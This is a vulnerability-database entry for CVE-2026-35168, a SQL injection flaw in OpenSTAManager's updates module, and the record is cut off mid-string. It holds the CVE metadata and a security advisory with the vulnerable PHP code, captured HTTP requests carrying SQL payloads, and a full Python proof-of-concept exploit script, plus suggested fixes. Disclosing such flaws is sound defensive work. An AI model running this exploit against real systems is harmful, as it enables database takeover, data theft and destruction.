CVE-2026-35168 (GCVE-0-2026-35168)
Vulnerability from cvelistv5 – Published: 2026-04-02 13:48 – Updated: 2026-04-02 16:23
VLAI?
Title
OpenSTAManager: SQL Injection via Aggiornamenti Module
Summary
OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the Aggiornamenti (Updates) module in OpenSTAManager contains a database conflict resolution feature (op=risolvi-conflitti-database) that accepts a JSON array of SQL statements via POST and executes them directly against the database without any validation, allowlist, or sanitization. An authenticated attacker with access to the Aggiornamenti module can execute arbitrary SQL statements including CREATE, DROP, ALTER, INSERT, UPDATE, DELETE, SELECT INTO OUTFILE, and any other SQL command supported by the MySQL server. Foreign key checks are explicitly disabled before execution (SET FOREIGN_KEY_CHECKS=0), further reducing database integrity protections. This issue has been patched in version 2.10.2.
Severity ?
8.8 (High)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| devcode-it | openstamanager |
Affected:
< 2.10.2
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-35168",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-02T16:19:18.702127Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-02T16:23:20.657Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "openstamanager",
"vendor": "devcode-it",
"versions": [
{
"status": "affected",
"version": "\u003c 2.10.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the Aggiornamenti (Updates) module in OpenSTAManager contains a database conflict resolution feature (op=risolvi-conflitti-database) that accepts a JSON array of SQL statements via POST and executes them directly against the database without any validation, allowlist, or sanitization. An authenticated attacker with access to the Aggiornamenti module can execute arbitrary SQL statements including CREATE, DROP, ALTER, INSERT, UPDATE, DELETE, SELECT INTO OUTFILE, and any other SQL command supported by the MySQL server. Foreign key checks are explicitly disabled before execution (SET FOREIGN_KEY_CHECKS=0), further reducing database integrity protections. This issue has been patched in version 2.10.2."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-02T13:48:16.626Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98"
},
{
"name": "https://github.com/devcode-it/openstamanager/commit/43970676bcd6636ff8663652fd82579f737abb74",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/devcode-it/openstamanager/commit/43970676bcd6636ff8663652fd82579f737abb74"
},
{
"name": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2"
}
],
"source": {
"advisory": "GHSA-2fr7-cc4f-wh98",
"discovery": "UNKNOWN"
},
"title": "OpenSTAManager: SQL Injection via Aggiornamenti Module"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-35168",
"datePublished": "2026-04-02T13:48:16.626Z",
"dateReserved": "2026-04-01T17:26:21.133Z",
"dateUpdated": "2026-04-02T16:23:20.657Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-35168\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-02T14:16:31.543\",\"lastModified\":\"2026-04-07T18:30:59.500\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the Aggiornamenti (Updates) module in OpenSTAManager contains a database conflict resolution feature (op=risolvi-conflitti-database) that accepts a JSON array of SQL statements via POST and executes them directly against the database without any validation, allowlist, or sanitization. An authenticated attacker with access to the Aggiornamenti module can execute arbitrary SQL statements including CREATE, DROP, ALTER, INSERT, UPDATE, DELETE, SELECT INTO OUTFILE, and any other SQL command supported by the MySQL server. Foreign key checks are explicitly disabled before execution (SET FOREIGN_KEY_CHECKS=0), further reducing database integrity protections. This issue has been patched in version 2.10.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.10.2\",\"matchCriteriaId\":\"37690084-64E6-4E8B-8A92-8B55C8FC1E9F\"}]}]}],\"references\":[{\"url\":\"https://github.com/devcode-it/openstamanager/commit/43970676bcd6636ff8663652fd82579f737abb74\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-35168\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-02T16:19:18.702127Z\"}}}], \"references\": [{\"url\": \"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-02T16:19:29.009Z\"}}], \"cna\": {\"title\": \"OpenSTAManager: SQL Injection via Aggiornamenti Module\", \"source\": {\"advisory\": \"GHSA-2fr7-cc4f-wh98\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"devcode-it\", \"product\": \"openstamanager\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.10.2\"}]}], \"references\": [{\"url\": \"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98\", \"name\": \"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/devcode-it/openstamanager/commit/43970676bcd6636ff8663652fd82579f737abb74\", \"name\": \"https://github.com/devcode-it/openstamanager/commit/43970676bcd6636ff8663652fd82579f737abb74\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2\", \"name\": \"https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the Aggiornamenti (Updates) module in OpenSTAManager contains a database conflict resolution feature (op=risolvi-conflitti-database) that accepts a JSON array of SQL statements via POST and executes them directly against the database without any validation, allowlist, or sanitization. An authenticated attacker with access to the Aggiornamenti module can execute arbitrary SQL statements including CREATE, DROP, ALTER, INSERT, UPDATE, DELETE, SELECT INTO OUTFILE, and any other SQL command supported by the MySQL server. Foreign key checks are explicitly disabled before execution (SET FOREIGN_KEY_CHECKS=0), further reducing database integrity protections. This issue has been patched in version 2.10.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-02T13:48:16.626Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-35168\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-02T16:23:20.657Z\", \"dateReserved\": \"2026-04-01T17:26:21.133Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-02T13:48:16.626Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
GHSA-2FR7-CC4F-WH98
Vulnerability from github – Published: 2026-04-03 03:47 – Updated: 2026-04-03 03:47
VLAI?
Summary
OpenSTAManager: SQL Injection via Aggiornamenti Module
Details
Description
The Aggiornamenti (Updates) module in OpenSTAManager <= 2.10.1 contains a database conflict resolution feature (op=risolvi-conflitti-database) that accepts a JSON array of SQL statements via POST and executes them directly against the database without any validation, allowlist, or sanitization.
An authenticated attacker with access to the Aggiornamenti module can execute arbitrary SQL statements including CREATE, DROP, ALTER, INSERT, UPDATE, DELETE, SELECT INTO OUTFILE, and any other SQL command supported by the MySQL server. Foreign key checks are explicitly disabled before execution (SET FOREIGN_KEY_CHECKS=0), further reducing database integrity protections.
Affected Code
File: modules/aggiornamenti/actions.php, lines 40-82
case 'risolvi-conflitti-database':
$queries_json = post('queries'); // Line 41: User input from POST
// ...
$queries = json_decode($queries_json, true); // Line 50: JSON decoded to array
// ...
$dbo->query('SET FOREIGN_KEY_CHECKS=0'); // Line 69: FK checks DISABLED
$errors = [];
$executed = 0;
foreach ($queries as $query) {
try {
$dbo->query($query); // Line 76: DIRECT EXECUTION
++$executed;
} catch (Exception $e) {
$errors[] = $query.' - '.$e->getMessage(); // Line 79: Error details leaked
}
}
$dbo->query('SET FOREIGN_KEY_CHECKS=1'); // Line 82: FK checks re-enabled
Key Issues
- No query validation: The SQL statements from user input are executed directly via
$dbo->query()without any validation or filtering. - No allowlist: There is no restriction on which SQL commands are permitted (e.g., only
ALTER TABLEorCREATE INDEX). - Foreign key checks disabled:
SET FOREIGN_KEY_CHECKS=0is executed before the user queries, allowing data integrity violations. - Error message leakage: Exception messages containing database structure details are returned in the JSON response (line 79).
- No authorization check: The action only requires module-level access, with no additional authorization for this destructive operation.
Root Cause Analysis
Data Flow
- Attacker sends POST request to
/editor.php?id_module=<Aggiornamenti_ID>withop=risolvi-conflitti-databaseandqueries=["<arbitrary SQL>"] editor.phpincludesactions.php(root), which checks module permission ($structure->permission == 'rw') at line 472- Root
actions.phpincludes the module'sactions.phpat line 489 modules/aggiornamenti/actions.phpreads thequeriesPOST parameter (line 41)- JSON-decodes it into an array of strings (line 50)
- Iterates over each string and executes it as a SQL query via
$dbo->query()(line 76)
Why This Is Exploitable
- The feature is intended for resolving database schema conflicts during updates
- However, there is no restriction on what SQL can be executed
- Any authenticated user with
rwpermission on the Aggiornamenti module can exploit this - The default admin account always has access to this module
Proof of Concept
Prerequisites
- A valid user account with access to the Aggiornamenti module
Step 1: Authenticate
POST /index.php HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
op=login&username=<user>&password=<pass>
Save the PHPSESSID cookie.
Step 2: Detect Aggiornamenti Module ID
Navigate to the application dashboard and inspect the sidebar links. The Aggiornamenti module URL contains id_module=<ID>. Default value in a standard installation: 6.
Step 3: Execute Arbitrary SQL
Request (captured in Burp Suite):
POST /editor.php?id_module=6&id_record=6 HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=6a1a8ab261f8d93c6e21d2ee566c17a5
Content-Type: application/x-www-form-urlencoded
op=risolvi-conflitti-database&queries=%5B%22DROP+TABLE+IF+EXISTS+poc_vuln04_verify%22%2C+%22CREATE+TABLE+poc_vuln04_verify+%28id+INT+AUTO_INCREMENT+PRIMARY+KEY%2C+proof+VARCHAR%28255%29%2C+ts+TIMESTAMP+DEFAULT+CURRENT_TIMESTAMP%29%22%2C+%22INSERT+INTO+poc_vuln04_verify+%28proof%29+VALUES+%28%27CVE_PROOF_arbitrary_sql_execution%27%29%22%5D
The URL-decoded queries parameter is:
[
"DROP TABLE IF EXISTS poc_vuln04_verify",
"CREATE TABLE poc_vuln04_verify (id INT AUTO_INCREMENT PRIMARY KEY, proof VARCHAR(255), ts TIMESTAMP DEFAULT CURRENT_TIMESTAMP)",
"INSERT INTO poc_vuln04_verify (proof) VALUES ('CVE_PROOF_arbitrary_sql_execution')"
]
Three arbitrary SQL statements are sent: DROP TABLE, CREATE TABLE, and INSERT INTO — demonstrating full control over the database.
Response (captured in Burp Suite):
The server responds with HTTP 200 and the following JSON response confirming successful execution of all 3 queries:
{"success":true,"message":"Tutte le query sono state eseguite con successo (3 query).<br><br>Query eseguite:<br>DROP TABLE IF EXISTS poc_vuln04_verify<br>CREATE TABLE poc_vuln04_verify (id INT AUTO_INCREMENT PRIMARY KEY, proof VARCHAR(255), ts TIMESTAMP DEFAULT CURRENT_TIMESTAMP)<br>INSERT INTO poc_vuln04_verify (proof) VALUES ('CVE_PROOF_arbitrary_sql_execution')","flash_message":true}
Step 4: Verify Execution
The table poc_vuln04_verify was created in the database with the inserted data, confirming that arbitrary SQL was executed. The server confirms: "Tutte le query sono state eseguite con successo (3 query)."
Observed Results
| Action | Result |
|---|---|
DROP TABLE IF EXISTS |
Table dropped successfully |
CREATE TABLE |
Table created successfully |
INSERT INTO |
Data inserted |
SELECT VERSION() (via INSERT...SELECT) |
MySQL version extracted: 8.3.0 |
| Server confirmation | "success":true with query count |
| Execution with admin user | Success |
| Execution with non-admin user (Tecnici group with module access) | Success |
Exploit
python3 poc_sql.py -t http://<target>:8888 -u admin -p admin
#!/usr/bin/env python3
import argparse
import json
import re
import sys
import urllib3
import requests
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
DEFAULT_HEADERS = {
"User-Agent": (
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/120.0.0.0 Safari/537.36"
),
}
def parse_args():
p = argparse.ArgumentParser(
description="OpenSTAManager <= 2.10.1 — Arbitrary SQL Exec in Aggiornamenti (PoC)",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=(
"Examples:\n"
" %(prog)s -t http://target:8888 -u admin -p admin\n"
" %(prog)s -t http://target:8888 -u admin -p admin --proxy http://127.0.0.1:8080\n"
" %(prog)s -t http://target:8888 -u admin -p admin --module-id 6\n"
),
)
p.add_argument("-t", "--target", required=True, help="Base URL (e.g. http://host:port)")
p.add_argument("-u", "--username", required=True, help="Valid username for authentication")
p.add_argument("-p", "--password", required=True, help="Password for authentication")
p.add_argument(
"--proxy",
default=None,
help="HTTP proxy (e.g. http://127.0.0.1:8080 for Burp Suite)",
)
p.add_argument(
"--module-id",
type=int,
default=None,
help="Aggiornamenti module ID (auto-detected if omitted)",
)
p.add_argument(
"--verify-only",
action="store_true",
help="Only verify the vulnerability, do not extract data",
)
return p.parse_args()
class OSMExploit:
def __init__(self, args):
self.target = args.target.rstrip("/")
self.username = args.username
self.password = args.password
self.module_id = args.module_id
self.session = requests.Session()
self.session.headers.update(DEFAULT_HEADERS)
self.session.verify = False
if args.proxy:
self.session.proxies = {"http": args.proxy, "https": args.proxy}
self.request_count = 0
def login(self):
info("Authenticating as '%s'..." % self.username)
# First GET to obtain a valid session cookie
self.session.get(f"{self.target}/index.php")
self.request_count += 1
r = self.session.post(
f"{self.target}/index.php",
data={"op": "login", "username": self.username, "password": self.password},
allow_redirects=False,
)
self.request_count += 1
if r.status_code != 302:
fail("Login failed (HTTP %d). Check credentials." % r.status_code)
return False
location = r.headers.get("Location", "")
# Success redirects to controller.php; failure redirects back to index.php
if "controller.php" in location:
success("Authenticated successfully.")
# Follow redirect to establish full session
self.session.get(f"{self.target}/{location.lstrip('/')}", allow_redirects=True)
self.request_count += 1
return True
# If redirected back to index.php, the login failed
# Common causes: wrong credentials, brute-force lockout, or active session token
fail("Login failed — redirected to '%s'." % location)
fail("Possible causes:")
fail(" 1. Wrong credentials")
fail(" 2. Brute-force lockout (wait 3 min or clear zz_logs)")
fail(" 3. Active session token (another session is open)")
fail(" Tip: clear the token with SQL: UPDATE zz_users SET session_token=NULL WHERE username='%s';" % self.username)
return False
def detect_module_id(self):
if self.module_id is not None:
info("Using provided module ID = %d" % self.module_id)
return True
info("Auto-detecting Aggiornamenti module ID...")
# Search for the module ID in the navigation HTML
r = self.session.get(f"{self.target}/index.php", allow_redirects=True)
self.request_count += 1
# Look for sidebar link: <a href="/controller.php?id_module=6" ...>...<p>Aggiornamenti</p>
matches = re.findall(r'id_module=(\d+)"[^<]*<[^<]*<[^<]*Aggiornamenti', r.text)
if matches:
self.module_id = int(matches[0])
success("Aggiornamenti module ID = %d" % self.module_id)
return True
# Secondary pattern: data-id attribute near Aggiornamenti text
matches = re.findall(r'data-id="(\d+)"[^<]*onclick[^<]*id_module=\d+[^<]*<[^<]*<[^<]*<[^<]*Aggiornamenti', r.text)
if matches:
self.module_id = int(matches[0])
success("Aggiornamenti module ID = %d" % self.module_id)
return True
# Fallback: try common IDs
for test_id in [6, 7, 8, 5, 4]:
r = self.session.get(
f"{self.target}/controller.php?id_module={test_id}",
allow_redirects=True,
)
self.request_count += 1
if "Aggiornamenti" in r.text or "aggiornamenti" in r.text.lower():
self.module_id = test_id
success("Aggiornamenti module ID = %d" % test_id)
return True
fail("Could not detect Aggiornamenti module ID. Use --module-id N.")
return False
def execute_sql(self, queries):
"""Execute arbitrary SQL via risolvi-conflitti-database."""
r = self.session.post(
f"{self.target}/editor.php?id_module={self.module_id}&id_record={self.module_id}",
data={
"op": "risolvi-conflitti-database",
"queries": json.dumps(queries),
},
)
self.request_count += 1
return r
def verify(self):
marker_table = "poc_vuln04_verify"
marker_value = "CVE_PROOF_arbitrary_sql_execution"
info("Step 1: Creating marker table via arbitrary SQL execution...")
queries = [
f"DROP TABLE IF EXISTS {marker_table}",
f"CREATE TABLE {marker_table} (id INT AUTO_INCREMENT PRIMARY KEY, proof VARCHAR(255), ts TIMESTAMP DEFAULT CURRENT_TIMESTAMP)",
f"INSERT INTO {marker_table} (proof) VALUES ('{marker_value}')",
]
r = self.execute_sql(queries)
info("Response: HTTP %d" % r.status_code)
info("Step 2: Verifying marker table exists by reading it back...")
# Use a second query to read the data via a UNION or time-based approach
# Since we can execute arbitrary SQL, we can verify by creating another
# marker and checking via a SELECT INTO approach
verify_queries = [
f"INSERT INTO {marker_table} (proof) VALUES (CONCAT('verified_', (SELECT VERSION())))",
]
r2 = self.execute_sql(verify_queries)
# The JSON response may be embedded within HTML (editor.php renders the full page
# after executing the action). Extract JSON from the response body.
for resp in [r, r2]:
# Try parsing as pure JSON first
try:
data = resp.json()
if data.get("success"):
success("SQL EXECUTION CONFIRMED! Server accepted and executed arbitrary SQL.")
success("Marker table '%s' created with proof value." % marker_table)
info("Response: %s" % data.get("message", "")[:200])
return True
except (ValueError, KeyError):
pass
# Extract embedded JSON from HTML response
json_match = re.search(r'\{"success"\s*:\s*true\s*,\s*"message"\s*:\s*"([^"]*)"', resp.text)
if json_match:
success("SQL EXECUTION CONFIRMED! Server accepted and executed arbitrary SQL.")
success("Marker table '%s' created with proof value." % marker_table)
info("Server message: %s" % json_match.group(1)[:200])
return True
# Check for query execution indicators in response
if "query sono state eseguite" in resp.text or "query eseguite" in resp.text.lower():
success("SQL EXECUTION CONFIRMED! Server reports queries were executed.")
return True
fail("Could not verify SQL execution. Check target manually.")
fail("Tip: use --module-id N if auto-detection failed.")
return False
def cleanup(self):
info("Cleaning up marker tables...")
self.execute_sql(["DROP TABLE IF EXISTS poc_vuln04_verify"])
self.execute_sql(["DROP TABLE IF EXISTS poc_vuln04_marker"])
self.execute_sql(["DROP TABLE IF EXISTS poc_vuln04_tecnico"])
success("Cleanup complete.")
# ── Output helpers ──────────────────────────────────────────────────
def info(msg):
print(f"\033[34m[*]\033[0m {msg}")
def success(msg):
print(f"\033[32m[+]\033[0m {msg}")
def fail(msg):
print(f"\033[31m[-]\033[0m {msg}")
# ── Main ────────────────────────────────────────────────────────────
def main():
args = parse_args()
exploit = OSMExploit(args)
if not exploit.login():
sys.exit(1)
if not exploit.detect_module_id():
sys.exit(1)
print()
info("=== Vulnerability Verification ===")
if not exploit.verify():
sys.exit(1)
print()
info("=== Cleanup ===")
exploit.cleanup()
print()
success("Verification complete. %d HTTP requests sent." % exploit.request_count)
info(
"All traffic was sent through the configured proxy."
if args.proxy
else "Tip: use --proxy http://127.0.0.1:8080 to capture in Burp Suite."
)
if __name__ == "__main__":
main()
Impact
- Confidentiality: Complete database exfiltration — credentials, PII, financial data, configuration secrets.
- Integrity: Full control over all database tables — insert, update, delete any record. An attacker can create new admin accounts, modify financial records, or plant backdoors.
- Availability: An attacker can
DROPcritical tables, corrupt data, or execute resource-intensive queries to cause denial of service. - Potential Remote Code Execution: Depending on MySQL server configuration, an attacker may be able to use
SELECT ... INTO OUTFILEto write arbitrary files to the server filesystem, or use MySQL UDF (User Defined Functions) to execute operating system commands.
Proposed Remediation
Option A: Remove Direct Query Execution (Recommended)
Replace the arbitrary SQL execution with a predefined set of safe operations. The conflict resolution feature should only execute queries that were generated by the application itself, not user-supplied SQL:
case 'risolvi-conflitti-database':
$queries_json = post('queries');
$queries = json_decode($queries_json, true);
if (empty($queries)) {
echo json_encode(['success' => false, 'message' => tr('Nessuna query ricevuta.')]);
break;
}
// ALLOWLIST: Only permit specific safe SQL patterns
$allowed_patterns = [
'/^ALTER\s+TABLE\s+`?\w+`?\s+(ADD|MODIFY|CHANGE|DROP)\s+/i',
'/^CREATE\s+INDEX\s+/i',
'/^DROP\s+INDEX\s+/i',
'/^UPDATE\s+`?zz_views`?\s+SET\s+/i',
'/^INSERT\s+INTO\s+`?zz_/i',
];
$safe_queries = [];
$rejected = [];
foreach ($queries as $query) {
$is_safe = false;
foreach ($allowed_patterns as $pattern) {
if (preg_match($pattern, trim($query))) {
$is_safe = true;
break;
}
}
if ($is_safe) {
$safe_queries[] = $query;
} else {
$rejected[] = $query;
}
}
if (!empty($rejected)) {
echo json_encode([
'success' => false,
'message' => tr('Query non permesse rilevate. Operazione bloccata.'),
]);
break;
}
// Execute only validated queries
foreach ($safe_queries as $query) {
$dbo->query($query);
}
// ...
Option B: Server-Side Query Generation
Instead of accepting raw SQL from the client, have the client send operation descriptors and generate the SQL on the server:
case 'risolvi-conflitti-database':
$operations = json_decode(post('operations'), true);
foreach ($operations as $op) {
switch ($op['type']) {
case 'add_column':
$table = preg_replace('/[^a-zA-Z0-9_]/', '', $op['table']);
$column = preg_replace('/[^a-zA-Z0-9_]/', '', $op['column']);
$type = preg_replace('/[^a-zA-Z0-9_() ]/', '', $op['datatype']);
$dbo->query("ALTER TABLE `{$table}` ADD COLUMN `{$column}` {$type}");
break;
// ... other safe operations
}
}
Option C: Restrict Access (Minimum Mitigation)
At minimum, restrict this operation to admin-only users:
case 'risolvi-conflitti-database':
if (!auth_osm()->getUser()->is_admin) {
echo json_encode(['success' => false, 'message' => tr('Accesso negato.')]);
break;
}
// ... existing code
Note: This alone is insufficient because even admin accounts can be compromised, and the feature still allows arbitrary SQL execution.
Additional Recommendations
- Remove
SET FOREIGN_KEY_CHECKS=0: Foreign key checks should never be disabled based on user-initiated actions. - Sanitize error output: Exception messages at line 79 leak database structure information. Replace with generic error messages.
- Add CSRF protection: Ensure the endpoint validates a CSRF token to prevent cross-site request forgery attacks.
- Audit logging: Log the actual SQL queries being executed (already partially implemented) but also log the requesting user's IP address and session.
Credits
Omar Ramirez
Severity ?
8.8 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.10.1"
},
"package": {
"ecosystem": "Packagist",
"name": "devcode-it/openstamanager"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.10.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-35168"
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-03T03:47:37Z",
"nvd_published_at": "2026-04-02T14:16:31Z",
"severity": "HIGH"
},
"details": "## Description\n\nThe Aggiornamenti (Updates) module in OpenSTAManager \u003c= 2.10.1 contains a database conflict resolution feature (`op=risolvi-conflitti-database`) that accepts a JSON array of SQL statements via POST and executes them directly against the database without any validation, allowlist, or sanitization.\n\nAn authenticated attacker with access to the Aggiornamenti module can execute arbitrary SQL statements including `CREATE`, `DROP`, `ALTER`, `INSERT`, `UPDATE`, `DELETE`, `SELECT INTO OUTFILE`, and any other SQL command supported by the MySQL server. Foreign key checks are explicitly disabled before execution (`SET FOREIGN_KEY_CHECKS=0`), further reducing database integrity protections.\n\n## Affected Code\n\n**File:** `modules/aggiornamenti/actions.php`, lines 40-82\n\n```php\ncase \u0027risolvi-conflitti-database\u0027:\n $queries_json = post(\u0027queries\u0027); // Line 41: User input from POST\n // ...\n $queries = json_decode($queries_json, true); // Line 50: JSON decoded to array\n // ...\n $dbo-\u003equery(\u0027SET FOREIGN_KEY_CHECKS=0\u0027); // Line 69: FK checks DISABLED\n\n $errors = [];\n $executed = 0;\n\n foreach ($queries as $query) {\n try {\n $dbo-\u003equery($query); // Line 76: DIRECT EXECUTION\n ++$executed;\n } catch (Exception $e) {\n $errors[] = $query.\u0027 - \u0027.$e-\u003egetMessage(); // Line 79: Error details leaked\n }\n }\n $dbo-\u003equery(\u0027SET FOREIGN_KEY_CHECKS=1\u0027); // Line 82: FK checks re-enabled\n```\n\n### Key Issues\n\n1. **No query validation:** The SQL statements from user input are executed directly via `$dbo-\u003equery()` without any validation or filtering.\n2. **No allowlist:** There is no restriction on which SQL commands are permitted (e.g., only `ALTER TABLE` or `CREATE INDEX`).\n3. **Foreign key checks disabled:** `SET FOREIGN_KEY_CHECKS=0` is executed before the user queries, allowing data integrity violations.\n4. **Error message leakage:** Exception messages containing database structure details are returned in the JSON response (line 79).\n5. **No authorization check:** The action only requires module-level access, with no additional authorization for this destructive operation.\n\n## Root Cause Analysis\n\n### Data Flow\n\n1. Attacker sends POST request to `/editor.php?id_module=\u003cAggiornamenti_ID\u003e` with `op=risolvi-conflitti-database` and `queries=[\"\u003carbitrary SQL\u003e\"]`\n2. `editor.php` includes `actions.php` (root), which checks module permission (`$structure-\u003epermission == \u0027rw\u0027`) at line 472\n3. Root `actions.php` includes the module\u0027s `actions.php` 